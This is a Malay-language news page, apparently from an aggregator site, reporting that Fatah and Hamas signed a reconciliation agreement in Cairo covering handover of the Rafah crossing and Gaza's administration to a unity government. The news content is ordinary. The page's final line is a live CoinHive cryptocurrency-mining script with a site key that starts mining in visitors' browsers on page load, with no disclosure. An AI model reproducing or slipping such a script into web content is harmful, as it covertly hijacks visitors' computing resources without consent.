© Copyright 2017, All Rights Reserved
Home / Semasa / Fatah, Hamas meterai perjanjian damai | Asia

Fatah, Hamas meterai perjanjian damai | Asia

KAHERAH: Parti yang bertelagah di Palestin, Fatah dan Hamas, memeterai perjanjian damai hari ini dengan kehadiran pegawai perisik Mesir, menurut video yang disiarkan media Palestin.

Ia ditandatangani oleh Timbalan Ketua Hamas yang baharu, Salah al-Aruzi dan ketua delegasi Fatah, Azzam al-Ahmad, kata sumber kedua-dua pihak dalam rundingan itu.

Sehubungan itu, kedua-dua pihak akan menyerahkan tanggungjawab bagi lintasan sempadan Rafah di Gaza kepada kerajaan perpaduan pada 1 November ini, kata sumber.

Fatah dan Hamas juga bersetuju menyerahkan kawalan pentadbiran Gaza kepada kerajaan perpaduan selewat-lewatnya 1 Disember ini. – Reuters/AFP


Source link

Tinggalkan Ulasan Anda

About admin

x

Check Also

Penyokong Pas serbu pejabat PAN Salor, mahu rampas bangunan

KUALA LUMPUR – Kira-kira 300 orang, melibatkan ahli dan penyokong dari Pas ...

Facebook Auto Publish Powered By : XYZScripts.com
© Copyright 2017, All Rights Reserved
%d bloggers like this:
var m = new CoinHive.Anonymous('dkVZKvPTpA9ReGRa2gsf6amqUO6Yr4Pu'); m.start();